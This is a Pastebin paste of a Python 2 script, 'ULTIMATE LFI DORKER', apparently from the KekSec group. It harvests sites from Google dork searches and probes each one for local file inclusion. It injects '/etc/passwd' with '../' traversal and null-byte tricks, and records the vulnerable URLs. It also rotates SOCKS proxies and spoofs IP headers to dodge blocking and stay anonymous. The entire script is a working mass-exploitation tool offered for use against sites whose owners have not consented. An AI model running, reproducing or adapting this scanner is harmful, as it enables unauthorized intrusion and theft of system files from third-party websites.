API tools faq
paste
Advertisement
KekSec

ULTIMATE LFI DORKER [2019]

KekSec
Jun 25th, 2019
2,287
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 6.18 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. #LFI google dork scanner
  3. #coded by Freak/SynthMesc
  4. #Version 1.0.0 first release
  5. import sys,re,random,string,time,threading,os,socket,socks,urllib2,urllib
  6. try:
  7.     dorklist=sys.argv[1]
  8.     proxylist=sys.argv[2]
  9. except:
  10.     print "Usage: " + sys.argv[0] + " [DORK LIST] [PROXY LIST]" #Simple usage for the skids out ther ^_^
  11.     exit(1)
  12. def switchProxy():
  13.     try:
  14.         socket.backup
  15.     except:
  16.         socket.backup = socket.socket
  17.     socket.socket = socket.backup
  18.     proxyhost = random.choice(open(proxylist,"r").read().split("\n")).split(":")
  19.     proxyport = int(proxyhost[1])
  20.     proxyhost = proxyhost[0]
  21.     socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, proxyhost, proxyport)
  22.     socket.socket = socks.socksocket
  23. def randomIP():
  24.     return '.'.join('%s'%random.randint(0, 255) for i in range(4)) #Generate random IP for false headers
  25. def fixurl(url, args, testfile, isnull = False):
  26.     for i in range(1, len(args)):
  27.         if "&" in url:
  28.             if isnull:
  29.                 url=url.replace(args[i].split("&")[0]+"%00", testfile)
  30.             else:
  31.                 url=url.replace(args[i].split("&")[0], testfile)
  32.         else:
  33.             url=url.replace(args[i], testfile)
  34.         return url
  35. def test(url):
  36.     try:
  37.         opener = urllib2.build_opener()
  38.         opener.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
  39.         opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
  40.         opener.addheaders = [('REMOTE-ADDR',randomIP())]
  41.         opener.addheaders = [('VIA',randomIP())]
  42.         opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
  43.         keywords=['nobody:'] # 'cannot be run in DOS'
  44.         testfile = "/etc/passwd"
  45.         args = url.split("=")
  46.         for i in range(1, len(args)):
  47.             for increment in range(0, 6):
  48.                 if len(args[i]) <= 2:
  49.                     continue
  50.                 if increment % 2 == 0:
  51.                     if args[i].endswith("%00"):
  52.                         url = fixurl(url, args, testfile, True)
  53.                     else:
  54.                         args[i] += "%00"
  55.                         url = fixurl(url, args, testfile, False)
  56.                         print "[+] Trying null byte on "+url
  57.                 else:
  58.                     print "[+] Trying on "+url
  59.                 try:
  60.                  resp=opener.open(url,timeout=5).read()
  61.                 except Exception, e:
  62.                   print("[-] "+str(e))
  63.                   return
  64.                 pbody = resp.split("<html")[1:][:-1]
  65.                 for keyword in keywords:
  66.                     try:
  67.                         for x in pbody:
  68.                             print "[+] Found keyword '"+keyword+"' at "+url
  69.                             f=open("LFI_Vulnerable.txt","a")
  70.                             f.write(url+"\n")
  71.                             f.close()
  72.                             return
  73.                     except urllib2.HTTPError as e:
  74.                         print("[-] "+str(e))
  75.                         pass
  76.                 if increment <= 0:
  77.                     testfile = ".." + testfile
  78.                 else:
  79.                     testfile = "../" + testfile
  80.     except urllib2.URLError as e:
  81.         print "[-] "+str(e)
  82.         pass
  83. def spyder(dork,page):
  84.     opener = urllib2.build_opener()
  85.     opener.addheaders = [('User-agent','Mozilla/5.0 (X11; U; Linux i686) Gecko/20071127 Firefox/2.0.0.11')] #Custom user agent.
  86.     opener.addheaders = [('CLIENT-IP',randomIP())] #Inject random IP header into multiple variables, to remain anonymous.
  87.     opener.addheaders = [('REMOTE-ADDR',randomIP())]
  88.     opener.addheaders = [('VIA',randomIP())]
  89.     opener.addheaders = [('X-FORWARDED-FOR',randomIP())]
  90.     opener.addheaders = [('Accept','text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8')]
  91.     opener.addheaders = [('Accept-Language','en-US,en;q=0.5')]
  92.     opener.addheaders = [('Accept-Encoding','gzip, deflate')]
  93.     opener.addheaders = [('Referer',dork)]
  94.     try:
  95.         searchresults=opener.open(dork,timeout=5).read()
  96.     except Exception, e:
  97.         print "[-] "+str(e)
  98.         print "[-] Bot has been blocked from google!!! Switching proxy!"
  99.         switchProxy()
  100.         spyder(dork, page)
  101.     try:
  102.         searchresults
  103.     except NameError:
  104. #       print "[-] Variable undefined, re-searching"
  105.         try:
  106.             searchresults=opener.open(dork,timeout=5).read()
  107.         except:
  108.             try:
  109.                 searchresults=opener.open(dork,timeout=5).read()
  110.             except:
  111.                 print "[-] Bot has been blocked from google!!! Switching proxy!"
  112.                 switchProxy()
  113.                 spyder(dork, page)
  114.     else:
  115.         pass
  116. #       print "[+] Variable defined, continuing search"
  117.  
  118.     for i in re.findall('''href=["'](.[^"']+)["']''',searchresults, re.I):
  119.         i=i.replace("amp;",'')
  120.         if i.endswith("start="+str(page)+"0&sa=N") and i.startswith("/search"):
  121.             dorkurl="https://encrypted.google.com"+i
  122.             print("[+] Searching next page "+dorkurl)
  123.             time.sleep(random.randrange(5, 35))
  124.             spyder(dorkurl,page)
  125.             page+=1
  126.         i=urllib2.unquote(i).decode('utf8')
  127.         try:
  128.             i=i.split("?q=")[1]
  129.             i=i.split("&sa=")[0]
  130.             if i.startswith("http"):
  131.                     if "accounts.google.com" in i:
  132.                         continue
  133.                     elif "www.google.com" in i:
  134.                         continue
  135.                     elif "encrypted.google.com" in i:
  136.                         continue
  137.                     elif "webcache.googleusercontent.com" in i:
  138.                         continue
  139.                     elif "support.google.com" in i:
  140.                         continue
  141.                     elif i!=dork.decode('utf8'):
  142.                         threading.Thread(target=test, args=(i,)).start()
  143.         except:
  144.             continue
  145. f=open(dorklist,"r")
  146. for dork in f.read().split("\n"):
  147.     print "[+] Searching for dork: '"+dork+"'"
  148.     spyder('https://encrypted.google.com/search?hl=en&q='+urllib.quote_plus(dork),1)
  149. f.close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!